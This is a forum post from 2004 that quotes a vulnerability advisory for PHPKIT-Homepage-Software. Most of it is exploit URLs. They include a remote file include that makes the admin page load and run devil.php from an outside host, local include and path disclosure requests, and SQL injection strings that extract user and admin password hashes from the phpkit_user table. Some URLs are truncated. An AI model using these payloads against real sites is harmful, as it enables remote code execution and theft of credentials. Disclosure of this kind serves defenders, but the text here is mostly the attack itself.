qcred11
Jun 5 2004, 06:51 PM
| QUOTE |
Program: PHPKIT-Homepage-Software
Risk: Extremely High
Exploit: Yes
Homepage: http://www.phpkit.de/
Description:
Remote attacker can execute an arbitrary PHP code, sql injection and determine installation path.
Local include php:
http://hanter/include.php?path=/home/devil.php
Include in system administration:
http://hanter/admin/admin.php?path=http://host/devil.php
Installation path:
http://hanter/include.php?path=update_1602.php
SQL injection + getting md5 password's hash (Users and Admins) :
http://hanter/include.php?path=comment/com...null,user_email,
user_name,null,null,null,null,user_pw,null,null,null+FROM+phpkit_user+WHERE+user
_id='1
http://hanter/include.php?path=login/membe...,null,null,null,
null,user_pw,null,null,user_name,null,null,null,null,null,null,null,null,null,nu
ll,
null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null+
FROM
+phpkit_user+WHERE+user_name+LIKE+'%
http://hanter/include.php?path=comment/com...,null,null,null,
user_name,null,user_pw,null+FROM+phpkit_user+WHERE+user_id='1
+
http://hanter/include.php?path=login/useri...id='sql-inj
http://hanter/include.php?path=content/ove...er='sql-inj
http://hanter/include.php?path=forum/showc...id='sql-inj
http://hanter/include.php?path=login/imcen...id='sql-inj
http://hanter/include.php?newposttime='...=forum/main.php
http://hanter/include.php?path=forum/showt...d=3'sql-inj
http://hanter/include.php?path=login/maile...d=1'sql-inj
http://hanter/include.php?path=content/dow...=14'sql-inj
Credits: Hanter
{hanter-xxx-net@mail.ru}
|
Link is unavalable
sent by mailing list
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please
click here.
